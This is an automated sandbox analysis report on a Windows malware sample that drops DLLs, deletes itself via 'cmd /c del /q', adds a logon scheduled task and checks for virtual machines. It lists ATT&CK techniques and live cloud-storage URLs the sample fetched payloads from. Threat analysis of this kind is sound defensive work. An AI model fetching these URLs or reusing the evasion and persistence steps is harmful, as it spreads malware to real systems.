Source: msvcr120[1].dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zf_cef[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\zf_cef.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Memory allocated: 3790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Memory allocated: 3940000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Memory allocated: 5940000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Window / User API: threadDelayed 7482
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Window / User API: threadDelayed 2297
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcr120[1].dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp120[1].dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp120.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Program Files (x86)\Everything\vcruntime140.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zf_cef[1].dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcr120.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Program Files (x86)\Everything\zf_cef.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Dropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp140.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe TID: 3364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005FEBE2 FindFirstFileExW,0_2_005FEBE2
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW'
Source: zf_cef.dll.0.dr Binary or memory string: VMware, Inc.1
Source: zf_cef.dll.0.dr Binary or memory string: VMware, Inc.0
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: zf_cef.dll.0.dr Binary or memory string: noreply@vmware.com
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005F1241 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F1241
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_006024C9 GetProcessHeap,0_2_006024C9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005EA517 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005EA517
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005EA67A SetUnhandledExceptionFilter,0_2_005EA67A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005EA962 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005EA962
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005EA785 cpuid 0_2_005EA785
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00602090
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetLocaleInfoW,0_2_00602196
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0060226C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: EnumSystemLocalesW,0_2_005F86F0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_006018F7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: EnumSystemLocalesW,0_2_00601BEE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: EnumSystemLocalesW,0_2_00601BA3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetLocaleInfoW,0_2_005F8C1C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: EnumSystemLocalesW,0_2_00601C89
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00601D14
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: GetLocaleInfoW,0_2_00601F67
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005EA407 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005EA407
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Code function: 0_2_005E2E50 GetVersionExA,0_2_005E2E50
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 2 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 34 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 File Deletion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Source | Detection | Scanner | Label | Link
LisectAVT_2403002B_185.exe | 100% | Avira | TR/Scar.wfhdm |
LisectAVT_2403002B_185.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sgp.file.myqcloud.com | 43.153.232.152 | true | false | | unknown
bj.file.myqcloud.com | 82.156.94.48 | true | false | | unknown
leisuretrade-1323571269.cos.ap-beijing.myqcloud.com | unknown | unknown | true | | unknown
wwwqd-1323571269.cos.ap-singapore.myqcloud.com | unknown | unknown | true | | unknown
kdll-1323571269.cos.ap-beijing.myqcloud.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exe | false | Avira URL Cloud: safe | unknown
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll | false | Avira URL Cloud: safe | unknown
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dll | false | Avira URL Cloud: safe | unknown
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dll | false | Avira URL Cloud: safe | unknown
https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin | false | Avira URL Cloud: safe | unknown
https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dll | false | | unknown
https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
43.153.232.152 | sgp.file.myqcloud.com | Japan | | 4249 | LILLY-ASUS | false
82.156.94.48 | bj.file.myqcloud.com | China | | 12513 | ECLIPSEGB | false
82.156.94.47 | unknown | China | | 12513 | ECLIPSEGB | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1482004
Start date and time: 2024-07-25 17:08:29 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: LisectAVT_2403002B_185.exe
Detection: MAL
Classification: mal88.evad.winEXE@5/19@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 97
• Number of non-executed functions: 61
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: LisectAVT_2403002B_185.exe

Time | Type | Description
17:10:12 | Task Scheduler | Run new task: OnLogon path: C:\Program Files (x86)\Everything\Everything.exe s>1
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      Match: C:\Program Files (x86)\Everything\msvcp120.dll
                                      • Filename: SecuriteInfo.com.Win32.Malware.Dropper.Heur.12585.3788.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: N-9hndmrcq j9uj93.msi, Detection: malicious, Threat Name: Unknown
                                      Match: C:\Program Files (x86)\Everything\msvcp140.dll
                                      • Filename: LisectAVT_2403002B_246.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: LisectAVT_2403002B_246.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Threat Name: Unknown
                                      • Filename: 2024po.exe, Detection: malicious, Threat Name: GhostRat
                                      • Filename: 2024po.exe, Detection: malicious, Threat Name: GhostRat
                                      • Filename: psqlodbc-setup.exe, Detection: malicious, Threat Name: PrivateLoader
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):40917
                                                            Entropy (8bit):7.28053200206121
                                                            Encrypted:false
